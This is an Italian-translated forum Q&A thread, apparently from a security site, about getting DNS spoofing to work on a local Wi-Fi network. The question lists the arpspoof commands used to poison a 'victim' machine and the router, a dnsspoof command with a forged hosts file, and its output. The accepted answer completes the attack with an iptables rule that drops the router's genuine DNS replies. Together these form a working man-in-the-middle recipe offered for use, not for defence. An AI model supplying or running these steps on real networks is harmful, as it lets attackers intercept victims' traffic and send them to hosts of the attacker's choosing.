DNSspoof non funziona

8

Il mio obiettivo è DNSspoof.

La mia rete utilizza un router wireless con l'indirizzo 192.168.1.1 e il DNS primario è uguale all'indirizzo del router.

Ho abilitato l'IP del kernel in avanti in Linux.

Il file host DNS è spoofhosts.txt

173.252.74.22  google.co.in

La mia macchina vittima è 192.168.1.224

Ho fatto ARPspoof usando

#sudo arpspoof -t 192.168.1.224 192.168.1.1 -i wlan0
#sudo arpspoof -t 192.168.1.1 192.168.1.224 -i wlan0

e ho fatto DNSspoof

ashok@c:~$ sudo dnsspoof -f spoofhosts.txt -i wlan0 host 192.168.1.224 and udp port 53
[sudo] password for ashok: 
dnsspoof: listening on wlan0 [host 192.168.1.224 and udp port 53]
192.168.1.224.15703 > 192.168.1.1.53:  32219+ A? google.co.in
192.168.1.224.15703 > 192.168.1.1.53:  32219+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53:  3788+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53:  3788+ A? google.co.in

Ricevo le risposte sopra, ma DNSspoofing non funziona per la vittima.

Tuttavia, ho osservato in Wireshark sul sistema delle vittime. Mi dà questa informazione da che ho osservato che la risposta DNS proviene dal router più veloce di me.

Guarda la seconda riga che fornisce la risposta direttamente dal router con IP Google valido.

Come risolvere questo? È questo il problema con il comando DNSspoof? Cosa è successo?

    
posta ashok 20.08.2015 - 18:10
fonte

2 risposte

2

Finalmente, ho capito!

Dnsspoof non può modificare il pacchetto DNS, può solo inviare un altro pacchetto preparato con un indirizzo falsificato. Ma il vero pacchetto arriva alla vittima come prima e il computer della vittima prende in considerazione solo questo.

Il problema risolto è il blocco del pacchetto reale. L'ho fatto usando iptables con indirizzo specifico in hex:

# iptables --append FORWARD --match string --algo kmp --hex-string '|e1 e0 68 2d|' --jump DROP

Puoi trovare il tuo IP di destinazione del sito web in hex in Wireshark o un altro sniffer quando ti colleghi al server in modo corretto.

So che questo non è il metodo migliore ma funziona:)

    
risposta data 10.05.2016 - 01:32
fonte
1

Prova a svuotare la cache DNS su tutti i client coinvolti prima di tentare lo spoofing DNS.

Attivo Windows , apri un terminale e digita: ipconfig /flushdns

Attivo Linux , apri un terminale e digita: sudo /etc/init.d/nscd restart

On Mac OS X apri un terminale e digita: sudo dscacheutil -flushcache

    
risposta data 10.12.2015 - 23:28
fonte

Leggi altre domande sui tag